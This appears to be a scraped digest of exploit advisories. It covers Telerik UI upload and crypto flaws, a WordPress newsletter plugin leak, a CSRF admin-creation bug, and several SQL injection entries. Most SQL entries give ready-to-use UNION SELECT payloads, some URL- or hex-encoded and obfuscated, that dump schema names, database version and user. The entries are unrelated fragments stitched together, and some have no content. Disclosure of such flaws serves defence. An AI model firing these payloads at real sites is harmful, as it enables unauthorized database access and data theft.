Telerik Web UI for ASP.NET AJAX RadAsyncUpload: hardcoded keys / insecure direct object reference leading to arbitrary file upload. Telerik fixed this in June 2017 by removing the default keys in R2 2017 SP1 (2017.2.621) and by adding the ability to disable the RadAsyncUpload feature in R2 2017 SP2 (2017.2.711).
dp_crypto.py is an exploit for the Telerik UI for ASP.NET AJAX DialogHandler "Dialog cracker" vulnerability. It is a cryptographic weakness in Telerik.Web.UI.dll that allows an attacker to decrypt the encrypted data. The exploit works on versions 2012.3.1308 through 2017.1.118 (.NET 35, 40, 45).
Email Subscribers & Newsletters, a popular WordPress plugin, has just fixed a vulnerability that allowed an unauthenticated user to download the entire subscriber list, including names and e-mail addresses.
The vulnerability allows an attacker to inject SQL commands. Proof of Concept:
1) http://localhost/[PATH]/sellers_subcategories.php?IndustryID=[SQL] -105++/*!08888uNiOn*/(/*!08888SelECt*/+0x3078323833313239,0x283229,0x283329,0x283429,(/*!08888Select*/+export_set(5,@:=0,(/*!08888select*/+count(*)/*!08888from*/(information_schema.columns)where@:=export_set(5,export_set(5,@,/*!08888table_name*/,0x3c6c693e,2),/*!08888column_name*/,0xa3a,2)),@,2)),0x283629,0x283729)--+-
2) http://localhost/[PATH]/suppliers.php?IndustryID=[SQL]&CategoryID=[SQL]
The vulnerability allows an attacker to inject SQL commands. Proof of Concept:
http://localhost/[PATH]/index.php?id=[SQL]
http://localhost/[PATH]/mobile_preview.php?id=[SQL] -714'+UniOn+SElecT+(/*!08888Select*/+export_set(5,@:=0,(/*!08888select*/+count(*)/*!08888from*/(information_schema.columns)where@:=export_set(5,export_set(5,@,/*!08888table_name*/,0x3c6c693e,2),/*!08888column_name*/,0xa3a,2)),@,2)),2,3,4,5--+-
Photography CMS 1.0 is vulnerable to Cross-Site Request Forgery (CSRF), which allows an attacker to add an admin user to the application. The application does not verify the origin of the request and adds the user as submitted. The vulnerability can be exploited by sending a malicious link to the victim; when the victim clicks the link, an admin user controlled by the attacker is added to the application.
The vulnerability allows an attacker to inject SQL commands. Proof of Concept:
http://localhost/[PATH]/category/[SQL] %2d%33%20%20%2f%2a%21%30%31%31%31%31%55%4e%49%4f%4e%2a%2f%20%2f%2a%21%30%31%31%31%31%41%4c%4c%2a%2f%20%2f%2a%21%30%31%31%31%31%53%45%4c%45%43%54%2a%2f%20%30%78%33%31%2c%30%78%33%32%2c%43%4f%4e%43%41%54%28%44%61%74%61%62%61%73%65%28%29%2c%56%45%52%53%49%4f%4e%28%29%2c%30%78%37%65%2c%44%41%54%41%42%41%53%45%28%29%2c%30%78%37%65%2c%55%53%45%52%28%29%29%2d%2d%20%2d
The vulnerability allows an attacker to inject SQL commands.
The vulnerability allows an attacker to inject SQL commands into the vulnerable application.
The vulnerability allows an attacker to inject SQL commands. Proof of Concept:
http://localhost/[PATH]/site_search.php?s_vehicletype=auto&s_order=[SQL]&s_row=[SQL]%35%31%20%2f%2a%21%30%35%35%35%35%50%72%6f%63%65%64%75%72%65%2a%2f%20%2f%2a%21%30%35%35%35%35%41%6e%61%6c%79%73%65%2a%2f%20%28%65%78%74%72%61%63%74%76%61%6c%75%65%28%30%2c%2f%2a%21%30%35%35%35%35%63%6f%6e%63%61%74%2a%2f%28%30%78%32%37%2c%30%78%33%61%2c%40%40%76%65%72%73%69%6f%6e%2c%64%61%74%61%62%61%73%65%28%29%29%29%2c%30%29%2d%2d%20%2d